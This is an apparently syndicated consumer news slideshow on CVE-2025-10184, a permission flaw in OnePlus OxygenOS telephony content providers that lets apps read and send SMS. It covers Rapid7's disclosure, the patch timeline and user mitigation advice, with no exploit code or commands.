Major SMS flaw puts your OnePlus phone at risk

Major SMS vulnerability

A critical security flaw, identified as CVE-2025-10184, has been discovered in OnePlus smartphones running OxygenOS versions 12 through 15. This vulnerability allows malicious applications to access and send SMS and MMS messages without user consent.

The issue stems from modifications made by OnePlus to the Android Telephony service. Devices running OxygenOS 11 or earlier are reportedly unaffected. The flaw poses significant risks to user privacy and security.

Discovery by cybersecurity firm Rapid7

Cybersecurity firm Rapid7 identified the vulnerability in May 2025. They found that certain content providers in OxygenOS, such as PushMessageProvider and ServiceNumberProvider, lacked proper permission restrictions.

This oversight allowed apps to bypass Android’s permission system and access SMS/MMS data without user interaction or consent, including via SQL‑injection paths in the modified providers.

Rapid7 attempted to contact OnePlus privately but received no response. Consequently, they publicly disclosed the issue in September 2025.

Tracked as CVE-2025-10184 vulnerability

The vulnerability is officially tracked as CVE-2025-10184. It has been assigned a CVSS severity score of 8.2 out of 10, indicating a high risk. The flaw allows unauthorized applications to read and send SMS/MMS messages.

This can lead to the exposure of sensitive information, including two-factor authentication codes. The vulnerability affects a wide range of OnePlus devices.

Affects OxygenOS 12, 13, 14, 15

The flaw impacts OnePlus devices running OxygenOS versions 12, 13, 14, and 15. These versions introduced modifications to the Android Telephony service.

The changes included adding new content providers without proper permission checks. As a result, apps could exploit these providers to access SMS data. OxygenOS 11, based on Android 11, is not affected by this vulnerability.

Allows apps to read SMS

Due to the vulnerability, any installed application can read SMS and MMS messages without user consent. This includes access to sensitive information such as one-time passwords (OTPs) and two-factor authentication codes.

The flaw bypasses Android’s permission system, allowing unauthorized access. Users are not notified when their messages are accessed. This poses significant privacy risks.

Allows apps to send SMS

In addition to reading messages, the vulnerability may permit applications to perform write operations (such as sending or modifying SMS messages) depending on the implementation in the content provider. This could be exploited to send spam or fraudulent messages.

The flaw enables silent exfiltration of data, potentially leading to unauthorized actions. Users may not be aware that their device is sending messages on their behalf. This further compromises device security.

Potential exposure of 2FA codes

The vulnerability poses a significant threat to the security of two-factor authentication (2FA) systems. Malicious apps can intercept SMS-based 2FA codes, allowing attackers to bypass security measures.

This can lead to unauthorized access to user accounts. Experts recommend using app-based authenticators or hardware security keys as more secure alternatives. Relying on SMS for 2FA is no longer considered safe.

Confirmed on OnePlus 8T, 10

Rapid7 confirmed the vulnerability on the OnePlus 8T and OnePlus 10 Pro 5G models. These devices were tested running various versions of OxygenOS 12, 14, and 15. The flaw was consistently present across these devices.

While these models were specifically tested, the issue is believed to affect other OnePlus devices running the affected versions of OxygenOS. The problem is rooted in the platform’s core components.

Problem stems from telephony provider

The root cause of the vulnerability lies in OnePlus’s modification of Android’s Telephony content provider. OnePlus added components like PushMessageProvider and ServiceNumberProvider without implementing proper permission restrictions.

These components were designed to handle SMS and MMS data but lacked the necessary security measures. This oversight allowed malicious applications to exploit these providers and access sensitive information. The issue highlights the importance of secure coding practices.

OnePlus modifications lacked permissions

OnePlus’s modifications lacked proper read/write permission enforcement. However, these providers were not adequately secured. They were accessible without the standard READ_SMS permission, allowing any app to interact with them.

This lack of permission enforcement created a significant security gap. The oversight was not detected during internal testing, leading to the vulnerability’s existence in released devices.

Vulnerability present since 2021

The vulnerability has been present since the release of OxygenOS 12 in 2021. Despite being introduced years ago, it remained undetected until Rapid7’s discovery in 2025. The flaw persisted across multiple updates and versions of OxygenOS.

This indicates a systemic issue in the platform’s handling of telephony services. The prolonged existence of the vulnerability underscores the need for rigorous security assessments.

Rapid7 publicly disclosed after silence

After failing to receive a response from OnePlus regarding the vulnerability, Rapid7 chose to disclose the issue publicly. They had initially reported the flaw to OnePlus in May 2025, but did not receive acknowledgment.

In September 2025, Rapid7 published its findings along with a proof-of-concept exploit. This public disclosure aimed to alert users and prompt a response from OnePlus. OnePlus acknowledged the issue shortly thereafter.

OnePlus patch mid-October rollout

OnePlus has acknowledged the vulnerability and announced that a fix will be rolled out globally in mid-October 2025. The software update will address the permission bypass issue in the Telephony content provider.

Users are encouraged to install the update as soon as it becomes available. Until then, caution is advised when installing applications and handling sensitive information. Regularly checking for software updates can help mitigate potential risks.

Immediate mitigation steps to take

Until the patch is released, users should take proactive steps to protect their devices. Only install applications from trusted sources, such as the official Google Play Store. Avoid granting unnecessary permissions to apps.

Consider using encrypted messaging platforms for sensitive communications. Additionally, switch to app-based two-factor authentication methods instead of relying on SMS. These precautions can help reduce the risk associated with the vulnerability.

Avoid SMS-based two-factor authentication

Due to the vulnerability, SMS-based two-factor authentication (2FA) is no longer considered secure on affected OnePlus devices. Malicious applications can intercept SMS messages, including 2FA codes, compromising account security.

Users are advised to switch to more secure 2FA methods, such as app-based authenticators or hardware security keys. These alternatives provide enhanced protection against unauthorized access. Implementing stronger authentication measures is crucial for safeguarding online accounts.

Will this AI core make the OnePlus 13 unbeatable? Explore meet Plus Mind, the brain behind OnePlus 13.

Use trusted apps and updates

To mitigate potential risks, users should only install applications from reputable sources and developers. Regularly updating apps ensures that security patches and improvements are applied. Be cautious of granting unnecessary permissions to applications.

Monitor device behavior for any unusual activities. By maintaining vigilance and following best practices, users can enhance their device’s security. Staying informed about potential vulnerabilities and updates is essential.

Ready to upgrade? Explore OnePlus 13R vs Pixel 9A, which is better?

How do you plan to secure your OnePlus device until the patch for CVE-2025-10184 is released? Tell us in the comments.

Read More From This Brand:

• New SMS Scam Uses Elon Musk’s Face to Steal Money
• OnePlus Reveals AI Tool Meant to Help You Daily
• Is the OnePlus Pad 3 the ultimate Android answer to the iPad?

Don’t forget to follow us for more exclusive content right here on MSN.

If you like this story, you’ll LOVE our Free email newsletter. Join today and be the first to receive stories like these.

This slideshow was made with AI assistance and human editing.